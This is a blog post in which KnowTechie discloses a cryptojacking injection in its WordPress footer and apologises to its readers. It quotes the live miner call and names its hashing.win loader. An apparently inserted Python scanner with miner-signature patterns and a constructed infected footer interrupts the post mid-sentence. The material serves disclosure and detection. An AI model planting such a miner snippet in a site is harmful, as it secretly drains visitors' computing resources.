KnowTechie was breached by bitcoin bandits
The good news is that KnowTechie is no longer secretly mining bitcoin off its users and the whole overall experience should be improved now with our newly placed security features.
We got hacked, well, sort of.
I don’t know how it happened, but we found out that for the past couple of weeks, KnowTechie has been secretly mining bitcoin off our visitors. If you visited our website in that time, you might have noticed your computer running at its highest capacity. You may have noticed our site ran extremely slow or just thought it was your computer freezing up again. This was not the case, and for that, we are truly sorry.
To be clear, we didn’t implement this on the site. We did not profit in any way here. Instead, a malicious line of code was injected into KnowTechie which ran a script cleverly hidden in our footer file. With the script enabled, it basically uses up a visitor’s processing power to solve the math problems that confirm new transactions on the blockchain while producing new coins. It’s complex, I know, but the gist of it is that someone was profiting from all this, but unfortunately that someone was not us. If it had been, you know Jonathan would have written a review of a new jet-ski bitching about how it didn’t have an adequately sized cup holder.
It’s crazy, but this is happening to a lot of websites. Just recently, CBS’s Showtime was caught mining crypto-coins in viewers’ web browsers, a ‘Free’ Starbucks Wi-Fi network was caught mining for bitcoin, and researchers from a security firm noted that at least 500 websites running WordPress had been hacked to run a CoinHive mining script – which is what we suspect happened to us.
Here’s a similar experience that Politifact.com just went through as reported by ArsTechnica:
Earlier this month, political fact-checking site Politifact.com was found hosting Coinhive scripts in a way that exhausted 100 percent of visitors’ computing resources. A PolitiFact official told Ars the incident occurred when “an unidentified hacker attached a crypto mining script to the PolitiFact code base being stored on a cloud-based server.” The code has since been removed and was active only when people had a politifact.com window open in their browser.
This further solidifies our thoughts as to what happened to us, and it appears they were using a similar architecture to CoinHive.
How I discovered it
For the past couple of weeks, I noticed that the site was running really slow, and anytime I had any windows up from KnowTechie, my computer also crawled at a slow pace. I figured it was probably a bunch of junk files on my Mac that needed to be cleaned up so I used my usual cleanup apps to clear everything out. Sometimes that worked, and I would eventually forget about it.
Fast forward a couple of weeks later, and I’m running into the same issues again. I was convinced there was something wrong with my site. I found a couple of helpful articles that showed you how to tell if your computer was indeed secretly mining cryptocurrencies, and for the most part, they helped, but I still couldn’t verify if this was something on my computer or the site. Thankfully, a mod over at TechSpy and N4G confirmed a script that we found running in the footer.
Here’s the actual script:
var miner=new Client.Anonymous('9b23351e1f3f32e93028300c5d1c4c5a6ab2f10329e4e7093614fdced0163ca2');miner.start();
The script then leads you here: https://www.hashing.win/scripts/min.js, which looks like this:
How I fixed it, well, kind of
Now, I’m not a web developer by any stretch, but I do know my way around WordPress fairly well. But when it came to this, I really had no idea how to fix it. I tried contacting my hosting provider to see if it was something server related, but they verified that wasn’t the case and that the injection was made on the database side. Meaning, they couldn’t fix it, and it was up to me to figure this out. They did, however, refer me to a security firm who could help.
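Since the host traced the injection to the database rather than the server, a quick way to confirm a clean-up (or to catch a reinfection early) is to search both the theme files and the database-stored content for the signatures the snippet above exposes. The following Python script is an added example, not code from this post, from Sucuri or from the hosting provider; its indicator list is built from the strings on this page (Client.Anonymous, miner.start, hashing.win) plus the bare "coinhive" string, which is an assumption added here, and the sample sources, including the SITE_KEY_PLACEHOLDER site key, are constructed.

```python
import re
from typing import Dict, List

# Indicators of a browser-mining injection. The first three come straight from
# the snippet quoted in the post; "coinhive" is an added assumption, since the
# post only suspects a CoinHive-style script.
MINER_PATTERNS = [
    (r"new\s+Client\.Anonymous\s*\(", "Client.Anonymous() miner construction"),
    (r"miner\.start\s*\(", "miner.start() call"),
    (r"hashing\.win", "loader served from hashing.win"),
    (r"coinhive", "coinhive reference"),
]


def find_miner_indicators(name: str, content: str) -> List[Dict[str, object]]:
    """Return one hit per (line, pattern) match in a single named blob of text."""
    hits: List[Dict[str, object]] = []
    for line_no, line in enumerate(content.splitlines(), start=1):
        for pattern, label in MINER_PATTERNS:
            if re.search(pattern, line, re.IGNORECASE):
                hits.append({
                    "source": name,
                    "line": line_no,
                    "indicator": label,
                    "text": line.strip()[:120],  # trimmed excerpt for the report
                })
    return hits


def scan_sources(sources: Dict[str, str]) -> List[Dict[str, object]]:
    """Scan several named blobs: theme files, wp_options values, post bodies."""
    hits: List[Dict[str, object]] = []
    for name, content in sources.items():
        hits.extend(find_miner_indicators(name, content))
    return hits


def affected_sources(hits: List[Dict[str, object]]) -> List[str]:
    """Distinct sources that need cleaning, in a stable order."""
    return sorted({str(h["source"]) for h in hits})


# Constructed sample data: a clean footer, an infected footer carrying the same
# kind of snippet the post quotes (with a placeholder key), and a widget stored
# in the database that only pulls in the loader script.
SAMPLE_SOURCES = {
    "themes/mytheme/footer.php (clean)": "<?php wp_footer(); ?>\n</body>\n</html>\n",
    "themes/mytheme/footer.php (infected)": (
        "<?php wp_footer(); ?>\n"
        "<script src=\"https://www.hashing.win/scripts/min.js\"></script>\n"
        "<script>var miner=new Client.Anonymous('SITE_KEY_PLACEHOLDER');miner.start();</script>\n"
        "</body>\n</html>\n"
    ),
    "wp_options.widget_text[2]": "<script src='https://www.hashing.win/scripts/min.js'></script>",
}


if __name__ == "__main__":
    for hit in scan_sources(SAMPLE_SOURCES):
        print(f"{hit['source']}:{hit['line']}: {hit['indicator']}\n    {hit['text']}")
    print("needs cleaning:", affected_sources(scan_sources(SAMPLE_SOURCES)))
```

In practice the blobs handed to scan_sources() would be the theme directory plus a database export (for example from WP-CLI’s wp db export), because widget text, post content and plugin settings in wp_options are exactly where a database-side injection lands; re-running the scan on a schedule is what turns a one-off clean-up into an early warning for the next attempt.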
Remember the security firm I mentioned earlier that said 500 WordPress sites were hacked to mine bitcoin? Well, their name is Sucuri, and they were able to clean up our mess in just about 12 hours. Sure, I could have just removed the script manually from my footer, but what’s to stop the same hacker or another from doing this again? Honestly, we weren’t going to take the chance of unknowingly exploiting our viewers – you know, again. I needed something to protect us further down the line, and so I did what I had to do: I coughed up $299 for their annual service, which gave me an immediate response to our mining issue, plus a whole lot of other goodies which you can find here.
I don’t want this to sound like a ringing endorsement for Sucuri, but I have to give credit where it’s due because they totally did their job and then some. But seriously, after this whole ordeal, it really put into perspective that any site is susceptible to this. Whether it’s a massive site like Yahoo or an independent blog like KnowTechie, it can happen, and if you don’t keep a vigilant eye out, it can cost you an audience. I hope this wasn’t the case with our experience.
The good news is that KnowTechie is no longer secretly mining bitcoin off its users and the whole overall experience should be improved now with our newly placed security features. Again, I want to close with how sorry we all are here at KnowTechie about any inconvenience this may have caused you, and more importantly, your computers. Furthermore, you have our continued promise to do everything we can to keep our site secure as well as keep the connections of our readers free from any unexpected hijinks.